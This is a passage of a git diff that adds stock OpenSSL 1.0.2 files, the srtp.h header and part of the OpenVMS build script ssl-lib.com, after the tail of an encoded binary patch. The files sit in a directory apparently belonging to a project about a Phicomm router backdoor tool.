z*p`kEe>vr{HS~p!7p&87VE_h$q@Y~m5N1oYB<_+hw#P6qnkuM9bHwhQ&`SFIf`tJJ
zE&agA?A{|-j2(uLm{d~R`_LQJV`_9CsO*me&GX{V()YfYZ5u#^8We!0?~{27n#E_m
zwz9F}iFZ54YP|I2R_wZ=8hj`*lk;8)-d5tUi%zpleBf))GUppeQ#^vFdgAzKK2H&q
zmZrnj+$*GR(FDHQ8SEA>j8HbTx0jA~)#gdxQiN7~1DPdVM_jQnf=A|N`^A!BeGPAp
zvgS+l4Vd|+P@R2jxaV*&UieA&3u@v=@P*F_eBr}C@2P%i<3D763PG1aP+R-y%iyQv
zae%D{d{1Ov2Z1Xgy%B$!HdmTCYG`jstQ<j!Y~ZWjnxXwA=BTbCMP})-{a(`7=pp}k
zE_0^Z5Ds>UqXJY$gY9Tg@7YZ+$nzad?7(w+_b1t`q$O>!;w>k@)s~4=O)?7;>OwC4
z8;mO_{tY9}QQ6hf+d(`Sq)-J6*O&PY;^1#Q9)$kLXzpdT<wu&9V3G_P=`r~-`}iYv
zmaRPS-$uf`1+&cyv+<4eO;jh}(=AsC9`bnicu{OZypKW#S2}<`7o4Jk=XUC9a2W*D
z%<G{6ITGT14YYU{H5Ts^hN1T?I|-e}$9Y+6iN&Bu%K}Lj8!tZxO>Y9rJY_7MzK*Jk
zk9Nej`XTFURdtb<jnw@fk5F*#*h1~V5JA!|F}dHLeI-9}2GEbW*7X(AAakBh@0|fr
z{I30V@fX~6@lPxD9(oOstGCUrcNuJ2Pnhs=nLpZv@!i79#l{%j?yg}{>s#azP=a6?
zd%4aVh#%fLioz-yv7ZsW-2DDmY#xFr`GFjO($nYXr7Nu2w+96MM3q;dzU4MlP@f|A
zY=JT{eCV>4spM3Zq9x-cRL-2s3(l1V<T%uPe9%S03sXTK#L!c8FK2dg+X2zH+_`qP
z-a~Hx*QnI@J8<czHh2q93U)y^<T^~{Q>cFO1G_a9<=1<`CGlC%rn~J5eQyvs)d6{K
zcVW~AteT~{d9wt>cK6YMM#NI@=B0L2Z0d5-(%7WSFv9Y20Ho=$xkpl2`oyWcd%!fU
zm&P<0tVdz4Pw{7I@h-CEj~Ro(>#10su*mg+5LsI-RqNEBMJ0okY`OP>5Z%LaFMajh
zc$Ui{jv)${!%TDT9nE<0YDQ1I{da_B&#r_PwAeU$<N4Y2?*WbEWHuhoToJHV8G-7I
z-t$usCGRj~%;EAXAp*%&M*2SDc>rH-T|t7Ljq?F_a&Lc8j);P8@d?OjyRrDb3bqxS
zGk@VCZ)fw0)&?`y5%so2TUVGXz0IB8OB%J#8R5>3)g99!5S-3z|G!9cX3xIPTd{a~
ztksNptEbJFR(YlG+L(CsZJ1s;t#am62}^CjLF4c1G!5&cHs_Ybv{M`)OsR`rlu&Yg
zZGq-m<8hroVT^klEP?7=AWAgteEUvVrJbK(->H7U&WGr3lzNM1mAVaNZ@2LiZe(gp
zJzG&wwxxJhsW(+JtF+?YQU21(&7%XQRq-)_(k@r=pWLNYfc&KuAOY#DQV%$3S`Di2
zuz5X3RtjEQh*yeu-CKeRn@0soE92l*Q=D=M7XD!@G?Mduo5y^*lbk^*Cw=Wp=_d$T
z{u?>xlx{03zGw8va#Ek`ZC;;3(TrDcc%S{bKL1<M$h>M${b8HedA3|ziWX3x=M?sN
zo2&TWN0n9vN-KtUn&dfb^Y~{P^#6Jc=9IqVD&AC5S~YuwF(6)7P@m|Y<2B!TJll)2
z#Upo3*cE-=N@)}Q1WP@ei;C*UmAdQ4-!8}GLAzXpUygDMJ<csXTvGg3hsMZ;-?DlA
zCf`;++6s;jl)7txmDrOZNV*!ywqTUfwx+_iPE)f+x)JLo?rSL`bCkDMj{CCWCF31*
zgW4k|60Jo0kR1AHsaUfIxuB#tH_L|?6oXS?BC(4YA2sKv0C#C*fHJ+SGPoBDufhO3
zTg>QrX|aY4`Ut65qxWd1r(%ty8lL>(k-XXPR4X1w<$M+|EvC(ALAn{wXQF4SpUR(w
zZTwQ3UidWR@3Qeu8y7we`4leli-qZ*0E~oFR5udd=YZ26$&Ez+rUU+-1MY%}jKt?0
z2mC4ryvhN;$pOFJ0q=0Y=?&sYaz5aIf7bzj)B&fj;zr{CiUa<!13nf$Wh6eI0Zw+c
z$~JYeUSUjp4)k>n_(}&nZu39Ko*H5;1AjVIqjsY<F4i*OPdV@zbifZe;IBL2A2{Gc
z4tNoK?MQl?<bY3cz^`_|Z*ssFIp9qWIPFhIlJg!1{F@FqoivQZXO{zh5IBwFnP+0~
zkVG7T`#TQwryTH!aPcFxOMl8a5`GPEYF9s7G^>f216lej=8@>54)|IJJn4Xc+W~*f
z0pH_*A9BDCJK*m*;2%5SW3c3mqzByr_d4L$IN<Xg@UR2k?tpJ{!0!i6<6B`bcp@Ie
z_&(-9|C|H<iUWSw0YB=1pLD=SBh(m4&*wYfQylQi9PsNL@Y%pgKfk?5+P{c#kqtZ0
z-|2vx4){6;{5}VKhXej|2mBca{5KBxzXGTJp1fH0caywnLk{#hPQgbSm(KwwKI_XR
z19e<F%YlA@1HQ}wZ+F1E9q=s<_#+PZP6zxK4*0Jf@Yfyi_Z;wJ4!8%Q>PUK?;(*U^
zz~?&Pw>jVq4tNJ}8sAif9AB}ALblg|{#!Qv7pF>kv8O`zhc^Db%Oo!LNyzSU;PZ?F
zzRv;wqXYiB1D<xk|L%YnA)Xs)T+VjDFLS{C4)}Zr{7Vk_3I}|x1O6=s{4oc7zybfG
z1OB!H{(%F2!T~SAR&XRepYMQQ;(%Y}fM4f;8xHsv9PoAryxRf)h6DbH1HQ`vA8^25
zbim(sz&~=pOR#?!N&k}^@Tm@Xl>@%W0bk*OvqRp_&XyVB6;U(X8SPjd?Fg@mnk(BH
zwS@~qt8oy_v2bI9*)YvF^XlrE+O*K@O8W7QM5qa#ozd3D@XBaQOIx@j`qfyp)08;1
z6=`XXwwkh33(pD7pXCpQ=hxOQ3@!>U^3Mtd!&-2`f^d7x3`aXU+B&F}aK!9rAr?Z~
z*63Z3uCuebtu=?WcSKj`z*W&zkyY(lU{Pq{YF~Kz@UAF$SpNi{<!jAoXV`2DN1EGL
zLLDv5B=?=+)eSANC}mn>s{~<tLq})S?uhKA+0q$ZBRUywYHn#!eQ#)OY+EHdAbKv?
zb`pyj;mFFiHew<$V&2pd6^%5;+BLBALF(MV;JCh_Wrba{v3Ug)8jdtXRz@44-$+|W
zqbLH;Xyncj<O;VmnBYy#ijiq(iFTM;INWJA5dBIt-q0-cYZKVI5q*>OXgF-OEMJQ%
z4INSw9Z@JFYHRp3T{JW{Ius3WsIje;%V#%#XLM~ix(02vu83;E+v>yf0^!+<mWG>K
zn@w%OLVq~cj_x;U0Ru8Ltm+Jt>H-FAq&3=s9*4m|n{|tTal`0^mp7YIRl@4=5+vMC
zM8v%Q=HM5?oy}j1YO@yChUW$6g;#X6-34t%8(N9W^496gn_IaYG(b%)4Hy@y9}vS*
z2iYJrLl(DV?nwD1No{j$LkrPR7wAQd81CtEB4VIh8&@`Tt`r;=qEwLcW`#uPX?{E-
z7|!OV<_PuqwD|@gOax(bZF`h8)vk<+<`<iov;ETWo2NI1mtI|29lpgsFDM&hRKvz*
zf&Z33xV<wPYitXPNhG?~-qF08Bx;OCI@Y$EVpfyv9rnDQUmv_h%x%(eXH*l7Q4{U4
z<--OAb2%(VIBG^aq_V|efz}re7(zD!5L1YTsu^R|N~RELTLsI_S%Pd{kfBiAb3;#-
z1<#V_X3H(jEl1WEMYqV{A!jt&q4^iy;uGp?TmF@31ie(Il<T$vr~%=}awLSvX|Eiy
z7$~^n=BBk$AAD%p0Lqz80+0p4H)yl!=I6QJCOAmTAuF>v2J+dQ46;aeveQKGI<zK?
zT&vlX?}}ZWnkW!g`f?_uaFg)Qt+AFCt#Nv@Fd+ilW3XxR;C6$er<mKAQVeZqY3Nub
zEmfF<Z0^o*=gQ_L>0Zh4OM9llBF1g)Oe*2uZ2vJ#EPL&+iv*dN`eGKf#Z2MgXqx0?
zvRxFKu@{@L*&MkuYHBny$Z!`17cQ)ue~UJI!58Wm%@40?z<L)Eo#v%1FXiO!Md)~T
zUA+-pkaumyJpb(clg&M6tPNPBeABDKk>wFlJJ>3w7k50JD;uU?eT^pgaGW=^IxOG(
zavsc8*<AC^ht*XMNbtAoh`glEiLdB}J1Sar%$Qos+QN5rG^@plCVwl|(Qtc5o7pCP
zPD3OTh4V0*S4B19XRxMV>4KfMwuPbZ29v@7QZn(4%4mVSOwNsyohY5>%@-3G%g6Fq
zQxo|VGC^8a!gnoih7S{{Y+s;F`0b?Cc2$E^y1f#uY82|jlbD+{sgM_oi0CwRNY$0>
zgyG30O|7S$?a>G;98PcRke0IWa&-4jAu4sFP*kjjw9v@7K=KnaL<Ac`AwndjfpDy~
zF^aa(sis(KL}*bEbVM8QApq5adlAje;A7OeGG;cm-6dx246HV-(G_iGGilzgodaYz
zB4JX*D$LvltmL^??6pEX3oGD2V{>PFgBe*Fmcfc3Qc)nHCv#0MCX^xU>A?wgptZ5N
zb%kt^mVZfP+aAfJ!Y}GB)X@-Y!8!?3gF_%oLKqxvjfmivm@u8KZfh=7Tm<ufxd^E2
zVAU3L7)*PAnQ)vh-lE|<H<6||;N5s%LJ7yH+F7_1{Vy3#@8T7HJuyZidOCVmIQ^p%
zlnAE}+7-T!;hc{j=irox{#;y&zJcLfp6v`TWAuMw_<0N;MU0W?#`)0q#gypw8C<H}
zCmBvht_nZEaC$ebaQc9e5*2g)w=(>*C{y%348M@!*Wmn)67iv<OhrGR;a-N*xg;f`
zpNvb<ryOwlXqghxlMN{PJ_p=`b1q7S{0)X*jB>?i8^gICo@6-h*NY7IGCuD!ob$OD
z=R1^09<F~nN25eIA20FGm)UqZ?n=&IG5Sjw{w~9LyW?=)L5cW(4wvF{9>cl*Z)7;<
z^F@YV%J|H|ex4HXpNdQIzk}hIF+9QW%NhP1hI2WeU^tg&6!z_us9i44BMhI0G9}Mf
z>=*4s&-tulIQ<>JqSx@(9+Zf_5|_ej8SZ2Fe1=bF`0Wn(5W{CM`kPAefJE)i#HHF@
z$Z+~&M}@~2ehtHqGW=SGe^ti=67jFXrTBb@;nfV^#qjGG{yPW!4F~)qhJT*%xz0ZH
zA$hK6_!5Tm@p_Em^r!Jk{{0N+^sh6V_v-}1dB4t{2&PCR563Tdz^`Taji{sK`5D7+
zV)(x@oZI;u4CnNpFr3?YqrE_qoPNgtK8DX?_+J@5o8f1XvXF=m_e)b5&izsq!vm<J
z`n!bT+z!_=oU)4kAj3JI_Z;v}T6B>}PR{=mhI9R#LyI>O(erlaI^azVuSFdt=iLmS
z!|<&PHyFN#f&e6Hw+@%$b0aPGNQBSDrSN48znS4J45x2_6#Y7e&tv#DhTp>QpD~>4
zVL!v?Gy1m~&guVy;q{DuGzBY2)UR7{DLF53z^`IB=hMV+uD1b(FJSzC#qfm;{|m#p
zo<C&xB1V6L;d~s=p`Z$h`n4FB>Q|8ATt7_=zm3uFWcU(>?_oF}$Ab)C%IMP!=k1<k
zIQJ)$Xwo8){Cr+S89ohVs$V-9&h^&M@Gmm@GIAD3#GlJ^lLP(`!@q<&s@-=O&eyex
z6m%jL@}JA_+flCgtYUaI!|!1@m-A7EU&rX5X80WpA5Fn763O#rT&mqKF+9xhdl=5`
z_5p@3WAu;MIBhc;82)31Q>dcaeVp-G&hX<5k1*U#!7CEU&+Y1S4Cnf(b-)`K&h2e2
z!yD0tlJg%JeiOsL$8c`{PcfX^?H9eMj8te3JG}xv4L`{6CXgt3-eWlLFa6Oar9%Ec
zWcUh{=lC$3^Et-wm5jcOHZ4en{4ZfRO$EjOW`=YA_cFYk(QjvXGs7Qe_*WSITZVJ~
z?=$>PMt_pwEe!u0ZK9B<U#oB_`Ij)9^IvV_mw}e^|2m^@Wqf|jaBgo;Go14|;K2VS
zM$h@b%W!UQXOMD{s9){4RKKbi{#Ay@7|#2<pW&U1{;-V~0Xu`??=X6k;S*@Hhg5=#
z^YJn~hB77R4Gib>Uv$8iGki7U)5Gw)7`~6;YZ(4(hOcF~*nHxd<o_DO&!j;`BD@xt
zlK)(Wf1Tme7`~3-GZ?;};qw^2f#H|aU?Wkx8*!<2gARC<;a!Y=Bg4BH{tbq2V)&yB
zk28E1!+RLs&+r7p0~L5cD%9s)45zB9Uyn1KkK>25X-6VH+-`j|L6HjW^BNl`dTyUz
zVmRkxF`UaY$nbl>OUd~chFc7Oli>!#-(~o{3_t5~JRp&rDO`%bm*HC&ei_3#{asgr
z2&qs%_c44c$`$_~F`Vo9DTZ%j^amLJ4Tg`R;0%e{y$_e-e>TIv$?)44&h@{N;WQN#
zpZgf@VfY?~bN+8Id?KSCa}^$tNKP^_#XrLEHijQ$ICWjof5LDc2mZVgL`cNH9G9a1
z9m8uFev08&F#LKS9*~F+j~gw9M^UEuKg{qT!^cg>15%+pGac{-hTo5Rihnc1A7FTj
z;hg>fhJTCEzsK+|Fx)o-4@e|uFD}(?jN$*l@b56ZgW*pwd^5w(nTZD^;{PBn#ouK3
zw;BFBhCjscKQVk8!{1~0cNktq#(_lbK8#DXJJrU?UnLnHW%Oq;{QC^&_Au%i5FrtN
z?yqiTe)4XVsdn8&jO4=gU6GSN9y?F?KQg?G;ooDpm*FJ8N;Ib^5ufdpv6F4)0{^}O
zaj&xTME?lGYZ(4d3^y45D8uU+{sV?DW%&PM_%eq7Gs9Ohd<VnZ8U7f<*D(Bt4DVw2
zj~L#|@E<dL8^eFX@CO-g52--5GyJD^o^DEJ(&xW0e5ai!T;&Pc&2X|sl?Ln#(f>?=
zxF2Bn&l&y_!yjk(s|<gF;fERiB*VRSo@C+j*wag3gr9HI83pt-2PiEQzmf;hciPWN
z=Ze4j`=g@;^y=@1=-(Nlr0CV(4bgv1#&Pv`DBBBg^>-p~72xXc3+NvU;C$3~_3H|7
z_5Jz71-Sa2{M`aveTVEW9?oBVZyYMX)%V8Qw9d7w%!cK-n;r7LQsp|LEe+F5`XX)`
zeK@F1Ti)5JP3veAUlD@HH_eAfA`%F4DAcCmYn@g2Hc*?^+Ga+l;g74Y6kn*>&nsGE
z)9_(HJ3i7_YuAph#3vOE_%h)CLGpqJseW_;uNwQg%=VwE*d8YJDC~@UYfTQ3nOB#{
z`;IbsKLa<a>z0q24U26A;kLT%Qk-cNw5tjV+oza-c>bT(r?7x{+RH9-GO6|{#^On}
zukI8}P`<GJE?fS0d1d6i1<y5j9!Y;)?UHc2ZMUR98lyt}EdWOCSK{Jn<+bw34uf+=
zN^W)k5=vA)M}*8b?fM*}d?D?fz{cRR#Uv7u9<=Lw?PqmU@~h`KGQ_j6{%*VewgSZ#
z)~7w-Nc!{I4z0@;nDjRum#VMqZ=|+CrWv27Uwp$nQQk{&({UBn9}BENL{VXBNZhmy
Y)F?}Z`Xlxu)!%N)N-0*CvW4~k6F0a91^@s6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/srtp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/srtp.h
new file mode 100644
index 0000000..2279c32
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/srtp.h
@@ -0,0 +1,147 @@
+/* ssl/srtp.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/*
+ * DTLS code by Eric Rescorla <ekr@rtfm.com>
+ *
+ * Copyright (C) 2006, Network Resonance, Inc. Copyright (C) 2011, RTFM, Inc.
+ */
+
+#ifndef HEADER_D1_SRTP_H
+# define HEADER_D1_SRTP_H
+
+# include <openssl/ssl.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# define SRTP_AES128_CM_SHA1_80 0x0001
+# define SRTP_AES128_CM_SHA1_32 0x0002
+# define SRTP_AES128_F8_SHA1_80 0x0003
+# define SRTP_AES128_F8_SHA1_32 0x0004
+# define SRTP_NULL_SHA1_80      0x0005
+# define SRTP_NULL_SHA1_32      0x0006
+
+# ifndef OPENSSL_NO_SRTP
+
+int SSL_CTX_set_tlsext_use_srtp(SSL_CTX *ctx, const char *profiles);
+int SSL_set_tlsext_use_srtp(SSL *ctx, const char *profiles);
+
+STACK_OF(SRTP_PROTECTION_PROFILE) *SSL_get_srtp_profiles(SSL *ssl);
+SRTP_PROTECTION_PROFILE *SSL_get_selected_srtp_profile(SSL *s);
+
+# endif
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl-lib.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl-lib.com
new file mode 100644
index 0000000..43fea17
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl-lib.com
@@ -0,0 +1,1229 @@
+$!
+$!  SSL-LIB.COM
+$!  Written By:  Robert Byer
+$!               Vice-President
+$!               A-Com Computing, Inc.
+$!               byer@mail.all-net.net
+$!
+$!  Changes by Richard Levitte <richard@levitte.org>
+$!
+$!  This command file compiles and creates the "[.xxx.EXE.SSL]LIBSSL.OLB" 
+$!  library for OpenSSL.  The "xxx" denotes the machine architecture of
+$!  ALPHA, IA64 or VAX.
+$!
+$!  It is written to detect what type of machine you are compiling on
+$!  (i.e. ALPHA or VAX) and which "C" compiler you have (i.e. VAXC, DECC 
+$!  or GNU C) or you can specify which compiler to use.
+$!
+$!  Specify the following as P1 to build just that part or ALL to just
+$!  build everything.
+$!
+$!    		LIBRARY    To just compile the [.xxx.EXE.SSL]LIBSSL.OLB Library.
+$!    		SSL_TASK   To just compile the [.xxx.EXE.SSL]SSL_TASK.EXE
+$!
+$!  Specify DEBUG or NODEBUG as P2 to compile with or without debugger
+$!  information.
+$!
+$!  Specify which compiler at P3 to try to compile under.
+$!
+$!	   VAXC	 For VAX C.
+$!	   DECC	 For DEC C.
+$!	   GNUC	 For GNU C.
+$!
+$!  If you don't specify a compiler, it will try to determine which
+$!  "C" compiler to use.
+$!
+$!  P4, if defined, sets a TCP/IP library to use, through one of the following
+$!  keywords:
+$!
+$!	UCX		for UCX
+$!	TCPIP		for TCPIP (post UCX)
+$!	SOCKETSHR	for SOCKETSHR+NETLIB
+$!
+$!  P5, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up)
+$!
+$!  P6, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!      ""       Compile with default (/NOPOINTER_SIZE)
+$!      32       Compile with /POINTER_SIZE=32 (SHORT)
+$!      64       Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV])
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$!  P7, if defined, specifies a directory where ZLIB files (zlib.h,
+$!  libz.olb) may be found.  Optionally, a non-default object library
+$!  name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$! Define A TCP/IP Library That We Will Need To Link To.
+$! (That Is, If We Need To Link To One.)
+$!
+$ TCPIP_LIB = ""
+$ ZLIB_LIB = ""
+$!
+$! Check What Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX.
+$!
+$   ARCH = "VAX"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ OPT_FILE = ""
+$ POINTER_SIZE = ""
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Define The OBJ and EXE Directories.
+$!
+$ OBJ_DIR := SYS$DISK:[-.'ARCHD'.OBJ.SSL]
+$ EXE_DIR := SYS$DISK:[-.'ARCHD'.EXE.SSL]
+$!
+$! Specify the destination directory in any /MAP option.
+$!
+$ if (LINKMAP .eqs. "MAP")
+$ then
+$   LINKMAP = LINKMAP+ "=''EXE_DIR'"
+$ endif
+$!
+$! Add the location prefix to the linker options file name.
+$!
+$ if (OPT_FILE .nes. "")
+$ then
+$   OPT_FILE = EXE_DIR+ OPT_FILE
+$ endif
+$!
+$! Initialise logical names and such
+$!
+$ GOSUB INITIALISE
+$!
+$! Tell The User What Kind of Machine We Run On.
+$!
+$ WRITE SYS$OUTPUT "Host system architecture: ''ARCHD'"
+$!
+$! Check To See If The Architecture Specific OBJ Directory Exists.
+$!
+$ IF (F$PARSE(OBJ_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIR 'OBJ_DIR'
+$!
+$! End The Architecture Specific OBJ Directory Check.
+$!
+$ ENDIF
+$!
+$! Check To See If The Architecture Specific Directory Exists.
+$!
+$ IF (F$PARSE(EXE_DIR).EQS."")
+$ THEN
+$!
+$!  It Dosen't Exist, So Create It.
+$!
+$   CREATE/DIR 'EXE_DIR'
+$!
+$! End The Architecture Specific Directory Check.
+$!
+$ ENDIF
+$!
+$! Define The Library Name.
+$!
+$ SSL_LIB := 'EXE_DIR'SSL_LIBSSL'LIB32'.OLB
+$!
+$! Define The CRYPTO-LIB We Are To Use.
+$!
+$ CRYPTO_LIB := SYS$DISK:[-.'ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO'LIB32'.OLB
+$!
+$! Set up exceptional compilations.
+$!
+$ CC5_SHOWN = 0
+$!
+$! Check To See What We Are To Do.
+$!
+$ IF (BUILDALL.EQS."TRUE")
+$ THEN
+$!
+$!  Since Nothing Special Was Specified, Do Everything.
+$!
+$   GOSUB LIBRARY
+$   GOSUB SSL_TASK
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  Build Just What The User Wants Us To Build.
+$!
+$   GOSUB 'BUILDALL'
+$!
+$! End The BUILDALL Check.
+$!
+$ ENDIF
+$!
+$! Time To EXIT.
+$!
+$ EXIT:
+$ GOSUB CLEANUP
+$ EXIT   
+$!
+$! Compile The Library.
+$!
+$ LIBRARY:
+$!
+$! Check To See If We Already Have A "[.xxx.EXE.SSL]SSL_LIBSSL''LIB32'.OLB" Library...
+$!
+$ IF (F$SEARCH(SSL_LIB).EQS."")
+$ THEN
+$!
+$! Guess Not, Create The Library.
+$!
+$   LIBRARY/CREATE/OBJECT 'SSL_LIB'
+$!
+$! End The Library Exist Check.
+$!
+$ ENDIF
+$!
+$! Define The Different SSL "library" Files.
+$!
+$ LIB_SSL = "s2_meth, s2_srvr, s2_clnt, s2_lib, s2_enc, s2_pkt,"+ -
+	    "s3_meth, s3_srvr, s3_clnt, s3_lib, s3_enc, s3_pkt, s3_both, s3_cbc,"+ -
+	    "s23_meth,s23_srvr,s23_clnt,s23_lib,        s23_pkt,"+ -
+	    "t1_meth, t1_srvr, t1_clnt, t1_lib, t1_enc, t1_ext,"+ -
+	    "d1_meth, d1_srvr, d1_clnt, d1_lib, d1_pkt,"+ -
+	    "d1_both,d1_srtp,"+ -
+	    "ssl_lib,ssl_err2,ssl_cert,ssl_sess,"+ -
+	    "ssl_ciph,ssl_stat,ssl_rsa,"+ -
+	    "ssl_asn1,ssl_txt,ssl_algs,ssl_conf,"+ -
+	    "bio_ssl,ssl_err,kssl,t1_reneg,tls_srp,t1_trce,ssl_utst"
+$!
+$ COMPILEWITH_CC5 = ""
+$!
+$! Tell The User That We Are Compiling The Library.
+$!
+$ WRITE SYS$OUTPUT "Building The ",SSL_LIB," Library."
+$!
+$! Define A File Counter And Set It To "0"
+$!
+$ FILE_COUNTER = 0
+$!
+$! Top Of The File Loop.
+$!
+$ NEXT_FILE:
+$!
+$! O.K, Extract The File Name From The File List.
+$!
+$ FILE_NAME = F$EDIT(F$ELEMENT(FILE_COUNTER,",",LIB_SSL),"COLLAPSE")
+$!
+$! Check To See If We Are At The End Of The File List.
+$!
+$ IF (FILE_NAME.EQS.",") THEN GOTO FILE_DONE
+$!
+$! Increment The Counter.
+$!
+$ FILE_COUNTER = FILE_COUNTER + 1
